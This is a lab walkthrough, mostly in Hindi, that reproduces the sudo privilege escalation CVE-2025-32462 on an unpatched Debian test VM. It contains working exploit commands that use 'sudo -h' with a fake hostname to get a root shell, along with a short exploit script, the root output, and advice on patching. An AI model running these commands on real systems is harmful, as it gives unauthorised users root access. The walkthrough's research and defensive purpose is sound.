
CVE-2025-32462 is a local privilege escalation vulnerability in sudo
CVE-2025-32462 sudo में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है जो कम विशेषाधिकार वाले उपयोगकर्ता को होस्टनाम-प्रतिबंधित sudo नियमों का दुरुपयोग करके रूट के रूप में कमांड निष्पादित करने की अनुमति देती है। समस्या इस बात में निहित है कि sudo ने ऐतिहासिक रूप से प्राधिकरण जाँच के दौरान -h (होस्ट) विकल्प को कैसे संभाला।
जब कोई sudoers नियम किसी विशिष्ट होस्टनाम तक सीमित होता है, तो sudo को केवल तभी निष्पादन की अनुमति देनी चाहिए जब सिस्टम होस्टनाम नियम से मेल खाता हो। त्रुटिपूर्ण तर्क के कारण, प्रभावित संस्करणों ने sudo -h के माध्यम से उपयोगकर्ता-द्वारा आपूर्ति किए गए होस्टनाम पर भरोसा किया, जिससे हमलावर प्रतिबंध को पूरी तरह से बायपास कर सकते हैं।
sudo ने -h <hostname> तर्क को प्राधिकरण निर्णयों को प्रभावित करने की अनुमति दी। भेद्य संस्करणों में, sudoers नियम मूल्यांकन के दौरान आपूर्ति किए गए होस्टनाम पर भरोसा किया गया, सिस्टम के वास्तविक होस्टनाम के विरुद्ध सख्ती से मान्य करने के बजाय।
परिणामस्वरूप, होस्ट-आधारित sudo प्रतिबंधों को बायपास किया जा सकता है।
यदि सफलतापूर्वक शोषण किया जाता है, तो एक स्थानीय हमलावर यह कर सकता है:
वास्तविक दुनिया के वातावरण में, यह भेद्यता विशेष रूप से खतरनाक है:
| घटक | विवरण |
|---|---|
| OS | डेबियन 11 (बुल्सआई – अनपैच्ड) |
| sudo संस्करण | ≤ 1.9.13 |
| पहुंच स्तर | स्थानीय उपयोगकर्ता |
| वर्चुअलाइज़ेशन | VirtualBox |
⚠️ नोट: आधुनिक Ubuntu और डेबियन रिलीज़ में समान संस्करण स्ट्रिंग बनाए रखते हुए बैकपोर्टेड पैच हैं। यह भेद्यता पैच किए गए सिस्टम पर पुनरुत्पादित नहीं की जा सकती।
sudo --version
अपेक्षित (भेद्य):
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
अपेक्षित:
attacker : attacker
उपयोगकर्ता sudo समूह से संबंधित नहीं होना चाहिए।
सुरक्षित रूप से sudoers संपादित करें:
sudo visudo
निम्नलिखित पंक्ति जोड़ें:
attacker prod-server = (root) ALL
prod-server एक नकली होस्टनाम हैसत्यापित करें:
sudo -l -U attacker
अपेक्षित:
User attacker may run the following commands on prod-server:
(root) ALL
उपयोगकर्ता स्विच करें:
su - attacker
सामान्य रूप से sudo का प्रयास करें:
sudo id
अपेक्षित:
attacker is not allowed to run sudo on <hostname>
भेद्यता को ट्रिगर करें:
sudo -h prod-server id
सफल शोषण आउटपुट:
uid=0(root) gid=0(root) groups=0(root)
रूट शेल प्राप्त करें:
sudo -h prod-server /bin/bash
सत्यापित करें:
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
exploit.sh के रूप में सहेजें, निष्पादन योग्य बनाएँ, और attacker उपयोगकर्ता के रूप में चलाएँ:
chmod +x exploit.sh
./exploit.sh
| क्रिया | परिणाम |
|---|---|
| सामान्य sudo | ❌ अस्वीकृत |
sudo -h prod-server id | ✅ रूट |
यह एक सफल विशेषाधिकार वृद्धि की पुष्टि करता है।
आधुनिक Ubuntu रिलीज़ sudo संस्करणों के साथ आती हैं जो प्रभावित सीमा के अंतर्गत आते हैं। हालाँकि, Ubuntu ने ऊपरी-प्रवाह संस्करण स्ट्रिंग को बदले बिना CVE-2025-32462 के लिए सुरक्षा फिक्स को बैकपोर्ट किया है।
परिणामस्वरूप:
sudo -h विकल्प अब प्राधिकरण जाँच को प्रभावित नहीं करतायह केवल संस्करण स्ट्रिंग के बजाय व्यवहारिक परीक्षण का उपयोग करके भेद्यता स्थिति को मान्य करने के महत्व को उजागर करता है।
sudo को पैच किए गए संस्करण में अपग्रेड करेंयह वॉकथ्रू केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए है। इस भेद्यता का उन सिस्टमों पर परीक्षण न करें जिनके आप स्वामी नहीं हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट अनुमति नहीं है।